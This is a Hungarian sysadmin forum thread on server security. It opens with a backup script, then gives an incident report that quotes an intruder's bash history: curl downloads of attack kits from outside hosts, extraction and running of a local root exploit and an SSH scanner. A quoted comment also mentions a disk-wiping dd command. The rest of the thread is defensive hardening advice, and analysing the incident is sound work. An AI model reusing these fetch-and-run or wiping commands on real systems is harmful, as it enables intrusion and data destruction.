[code:1:feba070eb0]
muszashi@mail:/etc/init.d$ cat mentes
#!/bin/bash
export naplo=/var/log/archivalas.log
echo " ">>$naplo
echo "------------------------KEZDETE ">>$naplo
echo " ">>$naplo
echo "Archiválási procedúra kezdete: $(date) ">>$naplo
echo " ">>$naplo
echo " ">>$naplo
echo "****** LÉPÉS 0: Babér mentésének becsatolása a helyi fájlrendszerbe és másolása... ">>$naplo
mount -t smbfs -o username=****,password=**** //berszerver/automentes /home/baber/felcsatolt >>$naplo 2>&1
cp /home/baber/felcsatolt/* /home/baber >>$naplo 2>&1
umount /home/baber/felcsatolt >>$naplo 2>&1
echo " ">>$naplo
echo "***** LÉPÉS 1: Helyi fájlszerver leállítása... ">>$naplo
echo " ">>$naplo
/etc/init.d/samba stop >>$naplo 2>&1
echo " ">>$naplo
echo "***** LÉPÉS 2: MySQL dumpolása és a tömörített állomány létrehozása kezdődik...: ">>$naplo
echo " ">>$naplo
mysqldump -u **** --password=**** egroupware >/home/egroupware.sql 2>>$naplo
cd /mentesek 2>>$naplo
export aktualis=$(date +%F"-"%X) 2>>$naplo
tar -czf $aktualis.tar.gz /home >>$naplo 2>&1
echo " ">>$naplo
echo "A tömörítés véget ért: $(date)">>$naplo
echo " ">>$naplo
echo " ">>$naplo
echo "A mentések könyvtár jelenlegi tartalma: ">>$naplo
echo " ">>$naplo
ls -1>>$naplo
echo " ">>$naplo
echo "Az akutális állomány az $aktualis.tar.gz">>$naplo
echo " ">>$naplo
echo " ">>$naplo
echo "***** LÉPÉS 3: Ellenörző összeg készítése... ">>$naplo
echo " ">>$naplo
md5sum $aktualis.tar.gz>$aktualis.tar.gz.sum 2>>$naplo
echo " ">>$naplo
echo "***** LÉPÉS 4: Az állomány DVD-re írása kezdődik: $(date)">>$naplo
echo " ">>$naplo
growisofs -Z /dev/hdd -R -J $aktualis.tar.gz >>$naplo 2>&1 < /dev/tty5
echo " ">>$naplo
echo "A DVD-re írás véget ért: $(date)">>$naplo
echo " ">>$naplo
echo " ">>$naplo
echo " ">>$naplo
mount /media/cdrom1 2>>$naplo
cd /media/cdrom1 2>>$naplo
echo "A DVD jelenlegi tartalma: ">>$naplo
echo " ">>$naplo
ls -1>>$naplo
echo " ">>$naplo
echo " ">>$naplo
echo " ">>$naplo
echo "**** LÉPÉS 5: Ellenörző összeg lefuttatása és az EREDMÉNYE: ">>$naplo
echo " ">>$naplo
md5sum -cv /mentesek/$aktualis.tar.gz.sum >/var/log/eredmeny 2>&1
cat /var/log/eredmeny >>$naplo 2>&1
cimzettneve="root@ceg.hu"
mail -s CEG_mentesi_ertesito $cimzettneve </var/log/eredmeny
rm /var/log/eredmeny
echo " ">>$naplo
echo " ">>$naplo
echo " ">>$naplo
echo "***** LÉPÉS 6: Babér átmeneti állományok törlése a Helyi fájlrendszerből... ">>$naplo
rm /home/baber/* >>$naplo 2>&1
echo " ">>$naplo
echo "***** LÉPÉS 7: Helyi fájlszerver elindítása... ">>$naplo
echo " ">>$naplo
/etc/init.d/samba start >>$naplo 2>&1
echo " ">>$naplo
echo " ">>$naplo
echo "Az archiválási procedúra véget ért! $(date)">>$naplo
echo " ">>$naplo
echo " ">>$naplo
cd / 2>>$naplo
umount /media/cdrom1 2>>$naplo
eject /dev/hdd 2>>$naplo
echo "------------------------VÉGE ">>$naplo
[/code:1:feba070eb0]
Aztán vasárnap lefut egy script ami törli a /mentesek partíció tartalmát. (ez egy külön disk) A lemezt minden reggel kiveszi a titkárnő, berakja a pakk tetejére és berak a gépbe egy másikat. 30 nap múlva a lemez újra sorrakerül.
Szóval nem kell nagy dolgokra gondolni, ahogy András barátommal szoktuk fogalmazni, ilyen botcsinálta rendszergazdák vagyunk. (Mondjuk van egy másik hely, ahol növekményes mentés van, xfs freez, meg pár extra, de végül is az már csak ennek a fűszerezése)
Üdv: M.
- A hozzászóláshoz be kell jelentkezni
Nekem fenntartásaim vannak ezzel a scripttel kapcsolatban. Gyakorlatilag feltételezi, hogy "offline" történik a mentés, ráadásul 5-10 ezer felhasználó esetén aligha járható út: túl lassú.
- A hozzászóláshoz be kell jelentkezni
muszashi: kliensekrol nem mentesz?
- A hozzászóláshoz be kell jelentkezni
[quote:f59ef0ca63="colos"]Nem olyan jellegu parancsra gondolok mint pl: dd if=/dev/zero of=/dev/hda, hanem egy nyilt kulcsra es egy parancskodra ami altal a fogado script nyit a tuzfalon egy portot amin keresztul mar be lehet sshra lepni
De ha a parancs csak akkor fut le, ha pl az smsben ^runme szöveg van, akkor miért ne lehetne dd-zni ill. miért lenne biztonsági rés? :roll:
- A hozzászóláshoz be kell jelentkezni
Sokat gondolkodtam, azon, hogy közre adjam-e a dolgot, vagy sem.
Aztán úgy döntöttaqm, aki gazfickó, az úgyis tudja, aki meg nem
az és nem tudja, hát tudja meg miként lehet betörni egy tűzfallal
védett rendszerbe (1 éve szeretnék váltani itt, de nem engedik):
Környezet: Közepes vas, széles sávú adsl, online kapcsolat SuSE 8.2,
SuSEFirewall2 tűzfal. SSH, POP3, HTTP - szóval semmi extra.
Az eset a múlt héten történt, vasárnap csíptük fülön az illetőt.
Romániából érkezett: 81.196.10.201 és még vagy 2-3 ennek közelében
lévő címről.
Szólnak a szólgáltatótól, hogy valaki ssh-ziuk kifelé ezerrel. Bemegyek,
ps ax - azt látom valami ./ssh-scan 100 fut sok-sok példányban.
Gőzöm nem volt, hogy hogy került ide ez a program. Restart...
Csináltam egy kis scriptet, ami netstat -T -val 10 percenként
kiloggolja a TCP/IP rendszer állapotát. Szombat éjjel leállt a gép,
- a központi ping-ellenörző script jelzi is ezt - illetve kívülről nem
lehetett föllépni rá. Hétfő reggel: restart... És lőn meglepetés:
rootként nem lehet belépni, valaki megváltoztatta a jelszót.
(A jelszó kitalálásának valószínűsége: nulla). Repare: boot cdről,
mount, majd chroot - jelszócsere - reboot.
Nézzük a logokat:
- a netstatoló script a leállás előtt közvetlenül nagyszámú kapcsolatot jelez.
- a /var/log/messages-ben ott feltételezett sor: Accepted password from root
Vajon mit csinálhatott a betörő, miután bejött és hogyan jött be?
A bejövetel egy proba nevű useren keresztül történt, legalábbis
ezt sejtjük (a jelszócserét megelőzte a proba-ként való belépés!)
Hogy mit csinált őkelme? Íme (a nyomokat nem tüntette le maga
után, hiba volt részéről)
id
wget
curl-O http://crawdaddy.home.ro/TurboB.tgz
curl -O http://crawdaddy.home.ro/TurboB.tgz
tar xzvf TurboB.tgz
cd ssh
mail
curl-O http://ircd.bircd.org/bewareircd-linux.tar.gz
curl -O http://ircd.bircd.org/bewareircd-linux.tar.gz
tar zxvf bewareircd-linux.tar.gz
cd bircd
./bircd
ls
pico ircd.conf
vi ircd.conf
./rehash
./restart
vi ircd.conf
./restart
./rehash
kill -9 9257
cd bircd
ls
./stop
cd bircd
ls
./rehash
./bircd
vi ircd.conf
ls
vi bircd.ini
./rehash
./restart
cd bircd
./bircd
vi bircd.ini
./rehash
./restart
./bircd
ls
vi bircd.ini
vi bircd.txt
vi bircd-qnet.ini
./rehash
vi stdout.txt
./rehash
./restart
./bircd
ls
vi ircd.conf
./rehash
./restart
./bircd
cd ..
rm -rf *
ls
cd ssh2
cd ssh
curl -0 http://venerix.100free.com/root.tar.gz
curl-O http://venerix.100free.com/root.tar.gz
curl -O http://venerix.100free.com/root.tar.gz
tar zxvf root.tar.gz
cd root
./memo
id
./x
id
cd ..
rm -rf *
ls
Ezek a bash_history bejegyzései. Tehát bejött, letöltötte a számára
szükséges dolgokat, ebből felépített egy saját kis rendszert és
elkezdett innen kifelé kommunikálni, újabb áldozatokat keresni.
Csak ugródeszkának kellettünk neki, egyéb kárt nem okozott
(leszámítva a jelszócserét.)
Most nem elemzem ki a letöltött dolgokat, töltsétek le Ti is,
nézzétek meg mit csinált. Ebben rejlik a védekezés módja is.
Várom azoknak a hozzászólását, akiket hasonlóan törtek föl, illetve
akik nálam jobban tudják értelmezni a jelenséget.
- A hozzászóláshoz be kell jelentkezni
Nem neztem pontosan vegig, de a tippem latatlanban:
- brute force ssh tamadassal felnyomtak a proba usert (gondolom proba volt a jelszo :-)
- mivel a rendszer regi local root exploittal felnyomtak (tipp: root.tar.gz)
- jelszocserek
- irc szerver / bot / stb. letolt konfigural (bewareircd-linux.tar.gz)
- tovabbi potencialis ssh aldozatok kereses (ssh-scan, TurboB)
- stb.
szokasos eljaras
Javaslat: a rendszer ujratelepitese utan SSH-t csak publikus kulccsal es csak ismert IP cimekrol engedjunk. Ez egy kicsi, de fontos lepes a biztonsag fele.
- A hozzászóláshoz be kell jelentkezni
[quote:7690348011="drastik"][quote:7690348011="hunger"]huh, jó ez a topic. megint könnyesre röhögtem magam...
a sracok nagy szekuriti expertek
topicnyitonak:
btw.
1. miert a 22 es porton fut az sshd
2. miertnem jailben futnak a szolgaltatasok(vagy uml)
3. miert lehet sshzni barhonnan a gepre
4. ha mar linux akkor miertnem pax
5. miert passwd es miertnem kulcs
6. hogyhogy az osszes user su-zhat rootra
ez aki megtorte a gepedet egy luzer
egy profit eszre sem vennel
Szerintem ezeket nagyjából végig beszéltük és a fentiek elhangzottak, vagy tévedek?
(amellett, hogy a 3-ast továbbra sem tartom elfogadható megoldásnak a számomra, mivel bárhonnan bármikor be kellhet lépnem tehát knoppix CD és privát kulcs hordozása áll fenn, a többi OK.)
- A hozzászóláshoz be kell jelentkezni
[quote:157d13a5de="trey"]Nem neztem pontosan vegig, de a tippem latatlanban:
- brute force ssh tamadassal felnyomtak a proba usert (gondolom proba volt a jelszo :-)
- mivel a rendszer regi local root exploittal felnyomtak (tipp: root.tar.gz)
- jelszocserek
- irc szerver / bot / stb. letolt konfigural (bewareircd-linux.tar.gz)
- tovabbi potencialis ssh aldozatok kereses (ssh-scan)
- stb.
szokasos eljaras
Mentségemre legyen mondva: nem én vettem föl a proba usert,
(én is a proba jelszóra tippeltem (-:: ).
Kössz az infokat, én ebben igen járatlan vagyok, de nagyjából
arra a következtetésre jutottam mint Te.
- A hozzászóláshoz be kell jelentkezni
[quote:7e93a6e356="drastik"][quote:7e93a6e356="hunger"]huh, jó ez a topic. megint könnyesre röhögtem magam...
a sracok nagy szekuriti expertek
topicnyitonak:
btw.
1. miert a 22 es porton fut az sshd
2. miertnem jailben futnak a szolgaltatasok(vagy uml)
3. miert lehet sshzni barhonnan a gepre
4. ha mar linux akkor miertnem pax
5. miert passwd es miertnem kulcs
6. hogyhogy az osszes user su-zhat rootra
ez aki megtorte a gepedet egy luzer
egy profit eszre sem vennel
egy dolog felsorolni a megoldasokat, mas dolog telepiteni es karbantartani a dolgokat. aki nem csinalt meg ilyet az sem tudja, hogyan tesztelje le, hogy egyaltalan megfeleloen muxik. azert kell sshzni mert dolgozni kell az embernek, nem pedig szorakozasbol sztem.
udv zoli
- A hozzászóláshoz be kell jelentkezni
lehet, hogy láma vagyok, vagyis tudom, h. az vagyok, de egy proba nevű user szárnyait eléggé szokás visszanyírni, hogy "röpképtelen" legyen
- A hozzászóláshoz be kell jelentkezni
Ha már a bárhonnan SSH-ról van szó. Nem tudja valaki a magyarországi szolgáltatók ip címtartományát?
- A hozzászóláshoz be kell jelentkezni
Szerintem nem szabad semmi felesleges portot nyitva hagyni, minden irányba.
Alapnak kell lennie, hogy az ssh kizárólag pár ipről van beengedve, például, csak arról a 3-ról, ahonnan be fog lépni a szerver üzemben tartója, nem pedig az egész világ számára.
A kulcsos azonosítás is sokat segíthet, ha már így adminisztrálja az ember.
- A hozzászóláshoz be kell jelentkezni
[quote:216a89f537="csiga"]Szerintem nem szabad semmi felesleges portot nyitva hagyni, minden irányba.
Alapnak kell lennie, hogy az ssh kizárólag pár ipről van beengedve, például, csak arról a 3-ról, ahonnan be fog lépni a szerver üzemben tartója, nem pedig az egész világ számára.
A kulcsos azonosítás is sokat segíthet, ha már így adminisztrálja az ember.
És mi van abban az esetben, ha több felhasználód van és megbízol bennük és mégis nekiállnak a szerveren "játszani".
Hogy lehetne pl ssh-scan meg egyéb programok futtatását tiltani?
- A hozzászóláshoz be kell jelentkezni
A proba user accountjan keresztul egy local root exploittal root jogokat elehet szerezni. Hiaba nyirod vissza a szarnyait a user-nek, ha maga a kernel sebezheto. Ilyenkor jol johet meg a Grsec + PaX meg minden olyan patch ami a stack es heap manipulalas ellen ved vagy csokkenti a puffer tulcsordulas es az egyeb mas tamadasok (ret-to-libc) eselyeit. Persze az a legfontosabb, hogy a tamado ne jusson be sehogy...
[quote:237204686e="lzrd"]lehet, hogy láma vagyok, vagyis tudom, h. az vagyok, de egy proba nevű user szárnyait eléggé szokás visszanyírni, hogy "röpképtelen" legyen
- A hozzászóláshoz be kell jelentkezni
Én azt látom, hogy a betörési próbálkozások többnyire az ssh 22-es portja
ellen mennek és szisztematikusan néhány tized másodpercenként
egy új felhasználónévvel, vagy egy új jelszóval próbálkoznak - rendszerint
ugyanarról at ipcímről. Szerintem többé-kevésbé ez az egyetlen egy
dolog, ami megkülönbözteti az üzemszerű állapottól, ezzel kéne
csinálni valamit!
- A hozzászóláshoz be kell jelentkezni
[quote:25d98d5419="samuf"]Ha már a bárhonnan SSH-ról van szó. Nem tudja valaki a magyarországi szolgáltatók ip címtartományát?
ilyesmire gondolsz: GEO IP ?
- A hozzászóláshoz be kell jelentkezni
[quote:1234d68c6b="dirobi"]
Ha jól látom ezek itt ötletek. Fikázni mindenki tudd. Ha tudsz olyan megoldást, ami "megtörhetetlen", akkor mond, de olyat amitől a rendszer használható marad és nem egy lebetonozott pincében ücsörög a Rendzergazda, minden hálózattól elzárcva.
rosszul latod ezek itt baromsagok
de nyugodtan hasznald azokat
- A hozzászóláshoz be kell jelentkezni
[quote:df7f7e1c6c="_Polesz_"][quote:df7f7e1c6c="csiga"]Szerintem nem szabad semmi felesleges portot nyitva hagyni, minden irányba.
Alapnak kell lennie, hogy az ssh kizárólag pár ipről van beengedve, például, csak arról a 3-ról, ahonnan be fog lépni a szerver üzemben tartója, nem pedig az egész világ számára.
A kulcsos azonosítás is sokat segíthet, ha már így adminisztrálja az ember.
És mi van abban az esetben, ha több felhasználód van és megbízol bennük és mégis nekiállnak a szerveren "játszani".
Hogy lehetne pl ssh-scan meg egyéb programok futtatását tiltani?
Szerintem iszonyatos hiba bárkiben is megbízni, hogy ott rohangáljon egy gépen.
Legyen annyi adminisztrátora amennyi minimum szükséges, az is kollega legyen, akit számon lehet kérni és az is csak megadott ipről csatlakozzon.
Ez nem játék.
A másik ami eszembe jutott, ami általános hiba szokot lenni, hogy az a gyakorlat, hogy az ipfilter szabályokat úgy állítjákbe, hogy be nem jöhet semmi aztán kivételt tesznek, kifelé meg mehet bármi.
Ezzel sem értek egyet.
Szerintem befele ne jöjjön, semmi és kifelese menjen semmi aztán a kivételek.
DNS mehet ki, http vagy ftp ha kell az updatéhez az is csak a proxy felé.
Persze előfordulhat, hogy ezt nem lehet megvalósítani, mondjuk egy squid vagy valami hasolsó miat, de akkor is minimumra kell szorítani a kifelé komunnikáló lehetőségeket.
Nem azt mondom, hogy ez a kifelé semmi megvédte volna meditor-t mert mert ugye itt nem ezzel volt a probléma, de nagyban csökkenti a támadások jó részének a sikerét.
Példásul több webszerver is járt úgy, hogy valami gagyi php- portált kihasználva feltöltötek egy-egy cuccot, ami ha kifelé tudott volna beszálni, akkor igen nagy gáz lett volna.
Meg még az jutott eszembe, hogy a grsecurity access listjeivel megmondhatod, hogy melyik program futhat le melyik nem.
- A hozzászóláshoz be kell jelentkezni
[quote:a6051ab649="Panther"]Nekem fenntartásaim vannak ezzel a scripttel kapcsolatban. Gyakorlatilag feltételezi, hogy "offline" történik a mentés, ráadásul 5-10 ezer felhasználó esetén aligha járható út: túl lassú.
Ez nem is arra való. 20 felhasználó van, aki 01-kor már tutira nem dolgozik.
De egy hasonló van 100 felhasználós rendszeren is. Van egy xfs freez -es LVM snapshot-os egy ezeknél kicsit nagyobb helyen is.
Azt gondolom, hogy az adott igényekhez szükséges lehető legegyszerűbb megoldásokat kell alkalmazni. Ez a példaként írt helyeken (kivéve, ahol az LVM-el játszom elégséges megoldás), természetesen ha mások lennének a követelmények más megoldást alkalmaznék.
- A hozzászóláshoz be kell jelentkezni
Ez az ssh brute force. Altalaban szotarbol probalkoznak. A vedelemre mar feljebb mondtam valamit. Csak bizonyos IP-rol engedsz a 22-es portra csatlakozni. Ha igazan jot akarsz, akkor a jelszavas authot is letiltod, es publikus kulcsos auth-ot hasznalsz.
[quote:19306fe223="meditor"]Én azt látom, hogy a betörési próbálkozások többnyire az ssh 22-es portja
ellen mennek és szisztematikusan néhány tized másodpercenként
egy új felhasználónévvel, vagy egy új jelszóval próbálkoznak - rendszerint
ugyanarról at ipcímről. Szerintem többé-kevésbé ez az egyetlen egy
dolog, ami megkülönbözteti az üzemszerű állapottól, ezzel kéne
csinálni valamit!
- A hozzászóláshoz be kell jelentkezni
[quote:4e3214de91="Oregon"]muszashi: kliensekrol nem mentesz?
Nem, hiszen a kliensen nincs semmi. Roaming profiles a szerveren van (/home/samba/profiles), a 6 db különböző jogokkal bírő közös mappa a szerveren van (/home/samba/megosztás1-6), a felhasználó saját könyvtára a szerveren van (/home/$user), a levelezés a IMAP, könyvtára az /home/$user/Maildir, tehát a kliensen nincs semmi, csak a csupasz rendszer.
Amit lehet mindig központosítok. (Lusta fajta vagyok.)
Üdv:M.
- A hozzászóláshoz be kell jelentkezni
[quote:68f9c4ee20="trey"]Ez az ssh brute force. Altalaban szotarbol probalkoznak. A vedelemre mar feljebb mondtam valamit. Csak bizonyos IP-rol engedsz a 22-es portra csatlakozni. Ha igazan jot akarsz, akkor a jelszavas authot is letiltod, es publikus kulcsos auth-ot hasznalsz.
[quote:68f9c4ee20="meditor"]Én azt látom, hogy a betörési próbálkozások többnyire az ssh 22-es portja
ellen mennek és szisztematikusan néhány tized másodpercenként
egy új felhasználónévvel, vagy egy új jelszóval próbálkoznak - rendszerint
ugyanarról at ipcímről. Szerintem többé-kevésbé ez az egyetlen egy
dolog, ami megkülönbözteti az üzemszerű állapottól, ezzel kéne
csinálni valamit!
Egyelőre átpakoltam a szolgáltatás portját. Figyelni fogom, hogy
így mennyi a próbálkozás.
- A hozzászóláshoz be kell jelentkezni
[quote:46f147a7fa="drastik"][quote:46f147a7fa="dirobi"]
Ha jól látom ezek itt ötletek. Fikázni mindenki tudd. Ha tudsz olyan megoldást, ami "megtörhetetlen", akkor mond, de olyat amitől a rendszer használható marad és nem egy lebetonozott pincében ücsörög a Rendzergazda, minden hálózattól elzárcva.
rosszul latod ezek itt baromsagok
de nyugodtan hasznald azokat
őszintén irigyellek, hogy Neked már ennyire megy Mester
- A hozzászóláshoz be kell jelentkezni
Sokat nem ersz vele, mert van olyan script, amelyik nmap-pal kezd. :-) Ahol nyitott portot talal, oda probalkozik be.
[quote:8ab565fb6f="meditor"]Egyelőre átpakoltam a szolgáltatás portját. Figyelni fogom, hogy így mennyi a próbálkozás.
- A hozzászóláshoz be kell jelentkezni
[quote:e149a7cb83="trey"]Ez az ssh brute force. Altalaban szotarbol probalkoznak. A vedelemre mar feljebb mondtam valamit. Csak bizonyos IP-rol engedsz a 22-es portra csatlakozni. Ha igazan jot akarsz, akkor a jelszavas authot is letiltod, es publikus kulcsos auth-ot hasznalsz.
[quote:e149a7cb83="meditor"]Én azt látom, hogy a betörési próbálkozások többnyire az ssh 22-es portja
ellen mennek és szisztematikusan néhány tized másodpercenként
egy új felhasználónévvel, vagy egy új jelszóval próbálkoznak - rendszerint
ugyanarról at ipcímről. Szerintem többé-kevésbé ez az egyetlen egy
dolog, ami megkülönbözteti az üzemszerű állapottól, ezzel kéne
csinálni valamit!
Hát igen ez jó lenne, de például nekem itthon dinamikus címem, van, szóval sajnos IP-re nem tudok korlátozni. (bár az IP végül is könnyen hamisítható)
Szóval ezért (na nem csak ezért, sok egyéb miatt) választottam én is a jelszavas auth tiltását, csak kulcsok használatát. (a kulcsom meg jelszóval védem, így ha az itthoni gépet nyomnák fel, lopnák el, stb, akkor sem tudnának belépni a szerverre, a jelszó pedig egy többszörösen összetett mondat)
A mezei userek számára ahol szükség van scp,sftp-re, ott nekik csak ez van, de csak chroot-ba (rssh-val), akinek meg shell kell, azok is csak chroot-ba érkeznek. (persze ők is csak kulccsal) A tűzfal tervezésem hasonló a kolléga által említetthez. INPUT,OUTPUT,FORWARD=DROP , aztán a kivételek. Az ssh szerver pedig nem a 22-es porton figyel, hanem 5xxxx porton.
Szóval egyetértünk.
Üdv:M.
- A hozzászóláshoz be kell jelentkezni
[quote:30b3f4cc0b="csillagocska"]Egészségedre ha ittál, és remélem nagyon nem csúszott félre. 8) Én csupán azt írtam le amit tapasztaltam és a véleményem a témához. Te biztos jóval okosabb és ügyesebb vagy mint más. 8) Én nem szégyellek másoktól tanulni, és kérdezni.
johat szivesen beszelgetnek veled egy kv melett szekuritirol barmikor
:)
- A hozzászóláshoz be kell jelentkezni
[quote:be8a1ee9d8="trey"]Sokat nem ersz vele, mert van olyan script, amelyik nmap-pal kezd. :-) Ahol nyitott portot talal, oda probalkozik be.
[quote:be8a1ee9d8="meditor"]Egyelőre átpakoltam a szolgáltatás portját. Figyelni fogom, hogy így mennyi a próbálkozás.
Kéne írni egy programot, amely a 22-es portra érkező kéréseket csapdába
ejti. Úgy csinál, mintha ssh-lenne, de nem az. Aki a 22-es portot piszkálja,
az örökre le van tiltva minden portról.
Az nmap is egy port-scan. Ezt is lehetne detektálni, szerintem. Nem
üzemszerű, ha valaki másodpercenként tucatszor portot vált.
- A hozzászóláshoz be kell jelentkezni
[quote:2547102c3f="1aca"]En csak arra vagyok kivancsi, hogy ki nyer ebben a "dick-measuring-contest"-ben, avagy ki lesz a hup legfobb onkinevezesu biztonsagi szakertoje... get a life! (akinek nem inge, ne vegye magara)
en arra lennek kivancsi hogy a sok "deninyan leenugz a kiraly" wanabe rendszergazda mikor tanulja mar meg hogy a szekurity nem az apt-get update
- A hozzászóláshoz be kell jelentkezni
[quote:0c193571d8="drastik"][quote:0c193571d8="1aca"]En csak arra vagyok kivancsi, hogy ki nyer ebben a "dick-measuring-contest"-ben, avagy ki lesz a hup legfobb onkinevezesu biztonsagi szakertoje... get a life! (akinek nem inge, ne vegye magara)
en arra lennek kivancsi hogy a sok "deninyan leenugz a kiraly" wanabe rendszergazda mikor tanulja mar meg hogy a szekurity nem az apt-get update
Pedig ott kezdődik!
- A hozzászóláshoz be kell jelentkezni
Biztos lehetne. De az nmap fel van szerelve gyarilag olyan technikakkal, ami lehetove teszi szamara, hogy nehezebben legyen felfedezheto. Van olyan modja, amikor a teljes kapcsolat fel sem epul (SYN scan), vagy ami meg jobb a NULL, FIN, XMAS scan. Mondjuk ezeket egy modern IDS rendszer detektalja, de egy csupasz egyszeru gep nem biztos.
[quote:5466e6a57e="meditor"]Az nmap is egy port-scan. Ezt is lehetne detektálni, szerintem. Nem üzemszerű, ha valaki másodpercenként tucatszor portot vált.
- A hozzászóláshoz be kell jelentkezni
dyndns-es restrict, valaki kerdezte:
[code:1:2df5c84c4d]/etc/hosts.allow:
sshd: enhostom.no-ip.com[/code:1:2df5c84c4d]
ofcos libwrap support kell sshd-be jol.
- A hozzászóláshoz be kell jelentkezni
[quote:b8cdbc39bb="trey"]Hiaba nyirod vissza a szarnyait a user-nek, ha maga a kernel sebezheto.
Esetleg egy TPE bekapcs segithet, mert gagyiuser ne tudjon mar sajat maga altal feltoltott filet futtatni.
- A hozzászóláshoz be kell jelentkezni
azert kezdetnek ez se rossz, ha nem tudsz ip-cimre korlatozni
[code:1:41b9237966]iptables -A INPUT -i ! lo -p tcp -m tcp --dport 22 -m state --state NEW -m recent --set --name SSH --rsource
iptables -A INPUT -i ! lo -p tcp -m tcp --dport 22 -m state --state NEW -m recent --update --seconds 60 --hitcount 4 --name SSH --rsource -j DROP[/code:1:41b9237966]
- A hozzászóláshoz be kell jelentkezni
Ja és az alapokat majdnem elfelejtettem, ilyenek például:
/usr /bin /sbin /etc -ro
/home /var/log -noexec
stb . stb ......
Szóval egy jó fstab fájl, már fél siker.
Üdv: M.
- A hozzászóláshoz be kell jelentkezni
A /tmp-t is noexec-re, valamint ha ext2/3 van fenn, akkor ami readonly, arra még immutable flag is (chattr +i). Hátránya persze, hogy ezek után egy rendszerfrissítés eléggé nehézkesen megy...
- A hozzászóláshoz be kell jelentkezni
[quote:6c721c4f2e="muszashi"]Ja és az alapokat majdnem elfelejtettem, ilyenek például:
/usr /bin /sbin /etc -ro
Hat ez sokat nem er, mert ha nem egybol root, akkor ugysem tud oda irogatni... Remelhetoleg ;) Ha pedig egybol root, akkor ugyis mindegy...
[quote:6c721c4f2e="muszashi"]
/home /var/log -noexec
Na ez igen... De a tmp is bekerulhetne...
[quote:6c721c4f2e="muszashi"]
Szóval egy jó fstab fájl, már fél siker.
Üdv: M.
Egyetertek :)
- A hozzászóláshoz be kell jelentkezni
Egy szerver félrendszergazdája vagyok ahol kb 8 júzernek van ssh hozzáférése a szerverhez. Ezek ugye "nem megbízható" emberek a rendszergazdán kivül. Egy júzer volt olyan kedves és ssh-scan futtatot a /tmp/akarmi és /var/tmp/akarmi könyvtárakból. Mivel pont rendszerkarbantartást végeztem tűnt fel, hogy lassú a rendszer, és ekkor tudtam kiszűrni ezt a fajta tevékenységet. A júzer ssh hozzáférése ment a /bin/false-ra és a /tmp könyvtár tmpfs-ben noexec, nosuid jogokat kapott a /var/tmp szintén.
Van még mit tanulni biztonság terén :-(
- A hozzászóláshoz be kell jelentkezni
A sok hasznos hozzaszolason kivul esetleg lehetne olyat is csinalni iptables-el, hogy egy adott iprol egy adott idointervallumon belul hanyszor csatlakozhat vki. Esetleg vmi szkript, ami sok probalkozas utan tempban-ra teszi az illetot, amit aztan egy bizonyos ido elteltevel leszedi...vagy otthagyja, es majd kezzel kell kiszedni a blacklist-bol.
- A hozzászóláshoz be kell jelentkezni
Meditor, esetleg portkopogtatas?
itt 'http://www.hup.hu/modules.php?name=News&file=article&sid=9670' mar volt rola szo.
- A hozzászóláshoz be kell jelentkezni
[quote:c27593f946="muszashi"]A mezei userek számára ahol szükség van scp,sftp-re, ott nekik csak ez van, de csak chroot-ba (rssh-val), akinek meg shell kell, azok is csak chroot-ba érkeznek.
Az rssh és az scponly között valami lényeges különbség van? Ahogy nézegettem az rssh oldalát, mindkettő ugyanarra a dologra hivatott.
- A hozzászóláshoz be kell jelentkezni
[quote:2f4b7a84fa="gsimon"][quote:2f4b7a84fa="szaszg"][quote:2f4b7a84fa="gsimon"]A /tmp-t is noexec-re
agyon is vagtal minden progit, aki shell script-et akar futtatni (pl.: mc)
Ezt nem értem. Igaz, hogy próbaképp csak egy file-on lévő ext2-t mountoltam rá loop device-szal (mount -o loop,noexec tmp.img /tmp)
[code:1:2f4b7a84fa]
/dev/loop/1 on /tmp type ext2 (rw,noexec)
[/code:1:2f4b7a84fa]
de shell és perl scriptek működtek simán és midnight-ból is, a cgi-bin-ből az apache is tudott futtatni mindent. Egyrészt ez a noexec csak binárisokra áll, mert a scriptet az értelmezője egyszerűen olvasásra nyitja, másrészt meg nem a tmp-ből futtattam volna őket, hanem pl. a home-omból.
Jovaan naaa, en is lehettem magamon kivul egyszer... mit kell ugy felhanytorgatni... :-)
Zsiraf
Te sose voltal meg ugy besszivva, hogy hulyesegeket irtal????
- A hozzászóláshoz be kell jelentkezni
[quote:cac0f4ce28="drastik"][quote:cac0f4ce28="1aca"]En csak arra vagyok kivancsi, hogy ki nyer ebben a "dick-measuring-contest"-ben, avagy ki lesz a hup legfobb onkinevezesu biztonsagi szakertoje... get a life! (akinek nem inge, ne vegye magara)
en arra lennek kivancsi hogy a sok "deninyan leenugz a kiraly" wanabe rendszergazda mikor tanulja mar meg hogy a szekurity nem az apt-get update
Igy van, korrekt.
- A hozzászóláshoz be kell jelentkezni
[quote:3160891fff="muszashi"][quote:3160891fff="drastik"]
en arra lennek kivancsi hogy a sok "deninyan leenugz a kiraly" wanabe rendszergazda mikor tanulja mar meg hogy a szekurity nem az apt-get update
Pedig ott kezdődik!
Szvsz. sokkal biztonsagosabb egy jol bekonfigolt, nem teljesen up-to-date rendszer mint egy teljesen up-to-date, de nem jol bekonfigolt. Az apt-get update utan is marad eleg buffer overflow stb... Ha valaki nagyon be akar menni, be is fog. A kerdes, mit talal ott? Mihez fer hozza? Es hasonlok....
- A hozzászóláshoz be kell jelentkezni
[quote:c78789def0="WatchDog"]A sok hasznos hozzaszolason kivul esetleg lehetne olyat is csinalni iptables-el, hogy egy adott iprol egy adott idointervallumon belul hanyszor csatlakozhat vki. Esetleg vmi szkript, ami sok probalkozas utan tempban-ra teszi az illetot, amit aztan egy bizonyos ido elteltevel leszedi...vagy otthagyja, es majd kezzel kell kiszedni a blacklist-bol.
Én otthon ezt használom a próbálkozók ellen:
http://denyhosts.sourceforge.net/
- A hozzászóláshoz be kell jelentkezni
[quote:9c115055b0="meditor"]Az nmap is egy port-scan. Ezt is lehetne detektálni, szerintem. Nem üzemszerű, ha valaki másodpercenként tucatszor portot vált.
Nézd meg a portsentry-t! http://linux.cudeso.be/linuxdoc/portsentry.php
Üdv.: Tomyellow
- A hozzászóláshoz be kell jelentkezni
[quote:31158cd0c2="szaszg"]Jovaan naaa, en is lehettem magamon kivul egyszer... mit kell ugy felhanytorgatni... :-)Te sose voltal meg ugy besszivva, hogy hulyesegeket irtal????
Én? Ki van zárva. Csak azt nem értettem soha, hogy N+5 sör után a világ miért nem hajlandó a királyabbnál királyabb ötleteim szerint működni :). Pedig még a root jelszavak is eszembe jutottak :(...
- A hozzászóláshoz be kell jelentkezni
